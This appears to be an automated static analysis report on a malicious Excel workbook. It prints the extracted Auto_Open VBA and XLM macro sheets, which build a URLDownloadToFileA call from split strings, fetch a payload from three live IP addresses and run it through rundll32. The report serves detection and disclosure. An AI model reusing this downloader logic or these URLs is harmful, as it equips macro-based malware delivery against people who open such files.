Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 f538ca7abc446502…

MALICIOUS

Office (OOXML)

114.1 KB Created: 2015-06-05 18:19:34 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-05-15
MD5: 0703856bc4a2557b48601d4fdff42eb6 SHA-1: 79b4d78906ac58f67a2d2faddedddc53a085951a SHA-256: f538ca7abc44650201beaa454be3524f12af55db2059c1e6398fc22ebfe546c0
158 Risk Score

Heuristics 6

  • Excel 4.0 macro sheet (3 sheet(s)) critical 1 related finding OOXML_XLM_MACROSHEET
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
  • Dangerous XLM formula APIs: FORMULA, HALT, GOTO, REGISTER, EXEC critical OOXML_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
  • VBA project inside OOXML medium 1 related finding OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Private Sub Auto_Open()
  • Hidden worksheet (hidden) low OOXML_HIDDEN_SHEET
    Excel workbook contains 3 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://185.183.99.115/44313,6048108796.dat Referenced by macro
    • http://51.89.73.159/44313,6048108796.datReferenced by macro
    • http://190.14.37.38/44313,6048108796.datReferenced by macro
    • http://185.183.99.115/Referenced by macro
    • http://51.89.73.159/Referenced by macro
    • http://190.14.37.38/Referenced by macro
    • http://schemas.openxmlformats.org/spreadsheetml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2009/9/acIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2014/revisionIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2015/revision2In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision3In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision6In document text (OOXML body / shared strings)

Extracted artifacts 5

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2437 bytes
SHA-256: aa10abebc3ece39bf198cf3383ccb30417606e0a98d60e87747026c15426213c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Kikide"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True




Attribute VB_Name = "Briks"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Byutut"

Attribute VB_Name = "Vsewd"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Class2"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Class3"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Blasr"
Private Sub Auto_Open()
Application.Run Sheets("Nyukasl").Range("AJ6")

Application.Run Sheets("Nyukasl").Range("A5")
Application.Run Sheets("Nyukasl").Range("A5")






End Sub

Attribute VB_Name = "Vrest"

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{4F079883-D63C-4E2A-AD37-7B2F61A2BACD}{A61B2430-76EA-4B1D-A381-E7C23109F48A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 23552 bytes
SHA-256: 91a9b7465b88e20cedc488ee563b51a66933319637de00c1bc25730d49fcda6a
xlm_sheet_00.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet1.xml 4133 bytes
SHA-256: 1754d2e1b6c4f50a584bbed904e8c391f5774d8bb3d5d1aed732e1538fdab9f1
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{5E3EE2C8-4BD1-4A7A-8165-1C49BDB78CBA}"><dimension ref="AE74:AK92"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="13.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="29" width="13.5703125" style="3"/><col min="30" max="30" width="13.5703125" style="3" customWidth="1"/><col min="31" max="33" width="13.5703125" style="3" hidden="1" customWidth="1"/><col min="34" max="34" width="17.42578125" style="3" hidden="1" customWidth="1"/><col min="35" max="35" width="13.5703125" style="3" hidden="1" customWidth="1"/><col min="36" max="36" width="21.5703125" style="3" hidden="1" customWidth="1"/><col min="37" max="37" width="13.5703125" style="3" hidden="1" customWidth="1"/><col min="38" max="38" width="13.5703125" style="3"/><col min="39" max="39" width="21.42578125" style="3" bestFit="1" customWidth="1"/><col min="40" max="16384" width="13.5703125" style="3"/></cols><sheetData><row r="74" spans="33:36" x14ac:dyDescent="0.25"><c r="AG74" s="3" t="str"><f>CONCATENATE(AG80,AH78,AG78,AG79)</f><v>http://185.183.99.115/44313,6048108796.dat</v></c></row><row r="75" spans="33:36" x14ac:dyDescent="0.25"><c r="AG75" s="3" t="str"><f>CONCATENATE(AG81,AH78,AG78,AG79)</f><v>http://51.89.73.159/44313,6048108796.dat</v></c><c r="AI75" s="3"><v>1</v></c></row><row r="76" spans="33:36" x14ac:dyDescent="0.25"><c r="AG76" s="3" t="str"><f>CONCATENATE(AG82,AH78,AG78,AG79)</f><v>http://190.14.37.38/44313,6048108796.dat</v></c><c r="AI76" s="3"><v>9</v></c></row><row r="77" spans="33:36" x14ac:dyDescent="0.25"><c r="AJ77" s="3" t="b"><f>ON.TIME(NOW()+"00:00:02","Grestes")</f><v>0</v></c></row><row r="78" spans="33:36" x14ac:dyDescent="0.25"><c r="AG78" s="3" t="s"><v>0</v></c><c r="AH78" s="3"><f>NOW()</f><v>44313.604810879631</v></c></row><row r="79" spans="33:36" x14ac:dyDescent="0.25"><c r="AG79" s="3" t="s"><v>1</v></c><c r="AH79" s="3" t="b"><f>FORMULA(AG85&amp;AG86&amp;AG92,AI83)</f><v>0</v></c></row><row r="80" spans="33:36" x14ac:dyDescent="0.25"><c r="AG80" s="3" t="str"><f>"http://185.183.99.115/"</f><v>http://185.183.99.115/</v></c><c r="AJ80" s="3" t="b"><f>HALT()</f><v>0</v></c></row><row r="81" spans="33:35" x14ac:dyDescent="0.25"><c r="AG81" s="3" t="str"><f>"http://51.89.73.159/"</f><v>http://51.89.73.159/</v></c></row><row r="82" spans="33:35" x14ac:dyDescent="0.25"><c r="AG82" s="3" t="str"><f>"http://190.14.37.38/"</f><v>http://190.14.37.38/</v></c><c r="AI82" s="3" t="s"><v>2</v></c></row><row r="84" spans="33:35" x14ac:dyDescent="0.25"><c r="AI84" s="3" t="s"><v>3</v></c></row><row r="85" spans="33:35" x14ac:dyDescent="0.25"><c r="AG85" s="3" t="str"><f>"URLDo"</f><v>URLDo</v></c><c r="AI85" s="3" t="s"><v>4</v></c></row><row r="86" spans="33:35" x14ac:dyDescent="0.25"><c r="AG86" s="3" t="str"><f>"wnloadT"</f><v>wnloadT</v></c></row><row r="87" spans="33:35" x14ac:dyDescent="0.25"><c r="AH87" s="3" t="e"><f>GOTO(Blodas!G6)</f><v>#N/A</v></c></row><row r="88" spans="33:35" x14ac:dyDescent="0.25"><c r="AI88" s="3" t="s"><v>5</v></c></row><row r="92" spans="33:35" x14ac:dyDescent="0.25"><c r="AG92" s="3" t="str"><f>"oFileA"</f><v>oFileA</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
xlm_sheet_01.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet2.xml 2129 bytes
SHA-256: e160b159452c58df54bac64c2408088fc69c4a427060e264cc2ce4a1856b2db2
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{B06B5105-687C-43F7-A487-3A7680CBC977}"><dimension ref="G11:G18"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="6" width="9.140625" style="2"/><col min="7" max="7" width="12.140625" style="2" customWidth="1"/><col min="8" max="16384" width="9.140625" style="2"/></cols><sheetData><row r="11" spans="7:7" x14ac:dyDescent="0.25"><c r="G11" s="2" t="b"><f>REGISTER(Nyukasl!AI82,Nyukasl!AI83,Nyukasl!AI84,Nyukasl!AI85,,Nyukasl!AI75,9)</f><v>0</v></c></row><row r="12" spans="7:7" x14ac:dyDescent="0.25"><c r="G12" s="2" t="e"><f>Belandes(0,Nyukasl!AG74,Nyukasl!AI88,0,0)</f><v>#NAME?</v></c></row><row r="13" spans="7:7" x14ac:dyDescent="0.25"><c r="G13" s="2" t="e"><f>IF(G12&lt;0, Belandes(0,Nyukasl!AG75,Nyukasl!AI88,0,0))</f><v>#NAME?</v></c></row><row r="14" spans="7:7" x14ac:dyDescent="0.25"><c r="G14" s="2" t="e"><f>IF(G13&lt;0, Belandes(0,Nyukasl!AG76,Nyukasl!AI88,0,0))</f><v>#NAME?</v></c></row><row r="16" spans="7:7" x14ac:dyDescent="0.25"><c r="G16" s="2"><f>IF(G14&lt;0,CLOSE(0),)</f><v>0</v></c></row><row r="18" spans="7:7" x14ac:dyDescent="0.25"><c r="G18" s="2" t="e"><f>GOTO(Jioka!H4)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>
xlm_sheet_02.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet3.xml 1949 bytes
SHA-256: 0b087dc342d0a7c7ecdeb426e7cbcf43637a78a1fe8870ea48fc5df73c2f7887
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{7CC12E8C-181F-40F2-A690-14110549575E}"><dimension ref="H7:I20"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="7" width="9.140625" style="2"/><col min="8" max="8" width="9.85546875" style="2" customWidth="1"/><col min="9" max="16384" width="9.140625" style="2"/></cols><sheetData><row r="7" spans="8:9" x14ac:dyDescent="0.25"><c r="I7" s="2" t="str"><f>"rund"</f><v>rund</v></c></row><row r="9" spans="8:9" x14ac:dyDescent="0.25"><c r="I9" s="2" t="str"><f>"ll32 ..\Ladfge.VDGfwr,DllReg"</f><v>ll32 ..\Ladfge.VDGfwr,DllReg</v></c></row><row r="10" spans="8:9" x14ac:dyDescent="0.25"><c r="I10" s="2" t="str"><f>"isterServer"</f><v>isterServer</v></c></row><row r="16" spans="8:9" x14ac:dyDescent="0.25"><c r="H16" s="2" t="b"><f>PI()=EXEC(I7&amp;I9&amp;I10)=PI()</f><v>0</v></c></row><row r="20" spans="8:8" x14ac:dyDescent="0.25"><c r="H20" s="2" t="b"><f>HALT()</f><v>0</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>

Open this report in the interactive analyzer, or submit your own file for analysis.